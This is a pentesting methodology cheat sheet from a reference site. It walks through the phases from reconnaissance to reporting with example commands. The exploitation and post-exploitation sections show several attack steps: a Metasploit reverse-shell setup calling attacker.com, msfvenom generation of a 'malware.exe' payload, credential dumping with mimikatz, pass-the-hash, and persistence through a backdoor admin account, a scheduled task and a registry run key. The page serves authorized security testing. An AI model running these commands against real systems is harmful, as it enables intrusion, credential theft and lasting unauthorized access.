Zum Inhalt springen
1337skills 1337skills - Referenzen

Golden Guide for Pentesting

The Golden Guide for Pentesting is a comprehensive methodology framework covering all phases of penetration testing from reconnaissance through reporting.

Penetration Testing Phases

1. Reconnaissance and Information Gathering

Objective: Collect as much information as possible about the target without direct interaction.

Passive Information Gathering

# WHOIS lookup
whois target.com
whois 1.2.3.4

# DNS queries
dig target.com +short
nslookup target.com
host target.com

# Reverse DNS lookup
dig -x 1.2.3.4
nslookup 1.2.3.4

# Google dorking
# site:target.com filetype:pdf
# site:target.com intitle:"login"
# site:target.com "admin"

# Email harvesting
theHarvester -d target.com -b google,bing,yahoo

# Shodan search
# http.title:"target software"
# org:"Target Organization"

Active Reconnaissance

# Traceroute
tracert target.com        # Windows
traceroute target.com     # Linux

# Ping sweep
nmap -sn 192.168.1.0/24

# DNS zone transfer (AXFR)
dig @ns1.target.com target.com AXFR

# Banner grabbing
nc -v target.com 80
nc -v target.com 443

# Web technology detection
whatweb target.com
wappalyzer target.com

2. Scanning and Enumeration

Objective: Identify open ports, services, and potential vulnerabilities.

Port Scanning

# Basic port scan
nmap target.com
nmap -p- target.com           # All ports
nmap -p 1-65535 target.com    # Full range

# Service version detection
nmap -sV target.com

# OS detection
nmap -O target.com

# Aggressive scan
nmap -A target.com

# Stealth scan
nmap -sS target.com           # SYN stealth
nmap -sN target.com           # Null scan
nmap -sF target.com           # FIN scan

Service Enumeration

# FTP enumeration
ftp target.com
nmap -p 21 -sV target.com

# SSH enumeration
ssh -v target.com
nmap -p 22 --script ssh-* target.com

# SMTP enumeration
nmap -p 25 --script smtp-* target.com

# DNS enumeration
dnsrecon -d target.com

# SMB enumeration
smbclient -L //target.com
enum4linux target.com

# SNMP enumeration
snmp-check target.com
snmpwalk -v 1 -c public target.com

3. Vulnerability Scanning

Objective: Identify known vulnerabilities in services and applications.

Automated Vulnerability Scanning

# Nessus scan
# Install and configure Nessus
# Create new scan -> select policy -> configure target

# OpenVAS
openvas-start
# Navigate to web interface: https://localhost:9392

# Qualys Community Edition
# Upload and scan targets

# Rapid7 Nexpose
# Console-based vulnerability management

Web Application Scanning

# Burp Suite
# Capture and replay requests
# Active scanning features

# OWASP ZAP
zaproxy
# Target -> Spider -> Active Scan

# SQLmap
sqlmap -u "http://target.com/page.php?id=1" --dbs

# nikto
nikto -h target.com
nikto -h target.com -p 8080

4. Vulnerability Assessment

Objective: Determine exploitability and business impact of identified vulnerabilities.

Manual Testing

# Test authentication
# - Default credentials
# - Weak passwords
# - Session tokens
# - Multi-factor bypass

# Test authorization
# - Role-based access control (RBAC)
# - Privilege escalation
# - Horizontal access control

# Test input validation
# - SQL injection
# - Command injection
# - Cross-site scripting (XSS)
# - Path traversal

# Test cryptography
# - Weak algorithms
# - Missing encryption
# - Hardcoded keys

Code Review

# Static code analysis
# - SonarQube
# - Checkmarx
# - Fortify

# Vulnerable pattern detection
# grep -r "eval(" source/
# grep -r "exec(" source/
# grep -r "system(" source/

# Dependency checking
# npm audit
# pip audit
# safety check

5. Exploitation

Objective: Confirm vulnerabilities by successfully exploiting them.

Common Exploitation Techniques

# SQL Injection
sqlmap -u "http://target.com/?id=1" --risk=3 --level=5

# Cross-Site Scripting (XSS)
# Payload: <script>alert('XSS')</script>

# Remote Code Execution (RCE)
# Depends on specific vulnerability
# Metasploit exploitation

# Privilege Escalation
# Windows: mimikatz, UAC bypass, kernel exploits
# Linux: sudo misconfigurations, kernel exploits

Metasploit Framework

# Start Metasploit
msfconsole

# Search for exploit
search apache2 rce

# Select and configure
use exploit/linux/http/apache_chunked_encoding
set RHOSTS target.com
set LHOST attacker.com
set PAYLOAD payload/linux/x86/meterpreter/reverse_tcp

# Generate payload
generate -f elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=4444 -f exe -o malware.exe

6. Post-Exploitation

Objective: Assess impact and maintain access for reporting.

Lateral Movement

# Network reconnaissance
arp -a
ipconfig /all
route print

# Find other systems
ping 192.168.1.1-254

# Credential harvesting
hashdump              # Dump SAM hashes
lsadump              # LSASS dump
mimikatz             # Credential extraction

# Pass-the-hash
pth-winexe -U "DOMAIN\user%hash" //target /cmd

Persistence

# Create backdoor user
net user backdoor password /add
net localgroup administrators backdoor /add

# Scheduled task
schtasks /create /tn "Backdoor" /tr "malware.exe" /sc onstart /ru SYSTEM

# Registry run key
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /d "C:\malware.exe"

7. Reporting

Objective: Document findings and provide actionable recommendations.

Report Structure

# Penetration Test Report

## Executive Summary
[2-3 page overview for management]
- Assessment scope and objectives
- Key findings summary
- Risk ratings
- Recommendations

## Detailed Findings
[Organized by risk level]
- Critical (CVSS 9-10)
- High (CVSS 7-8.9)
- Medium (CVSS 4-6.9)
- Low (CVSS 0.1-3.9)

For each finding:
- Title and description
- Location/affected systems
- Steps to reproduce
- Business impact
- Remediation recommendation
- Evidence (screenshots, logs)

## Remediation Timeline
- Immediate (critical)
- 30 days (high)
- 90 days (medium)
- As scheduled (low)

Tool Matrix by Phase

PhasePrimary Tools
ReconnaissanceWhois, Dig, TheHarvester, Shodan, Google dorking
ScanningNmap, Masscan, Zmap
EnumerationEnum4linux, SMBClient, DnsRecon
VulnerabilityNessus, OpenVAS, Qualys, Nikto, SQLmap
AssessmentBurp Suite, OWASP ZAP, code reviewers
ExploitationMetasploit, Custom PoCs, SQLmap
Post-exploitationMimikatz, Meterpreter, Empire
ReportingHTML report generator, Dradis

Testing Standards

OWASP Testing Guide

  • OTG 1: Information Gathering
  • OTG 2: Configuration Management Testing
  • OTG 3: Authentication Testing
  • OTG 4: Session Management Testing
  • OTG 5: Authorization Testing
  • OTG 6: Business Logic Testing
  • OTG 7: Input Validation Testing
  • OTG 8: Error Handling
  • OTG 9: Cryptography
  • OTG 10: Client-side Testing

NIST Testing Methodology

  • Preparation Phase
  • Assessment Phase
  • Reporting Phase
  • Remediation Phase
  • Re-assessment Phase

Best Practices

  • Scope clearly: Define what’s in/out of scope
  • Get written authorization: Always have rules of engagement
  • Test incrementally: Don’t overload systems
  • Document everything: Maintain detailed notes
  • Clean up: Remove all backdoors and artifacts
  • Communicate clearly: Regular status updates
  • Stay professional: No data exfiltration or unnecessary damage

Last updated: 2026-03-30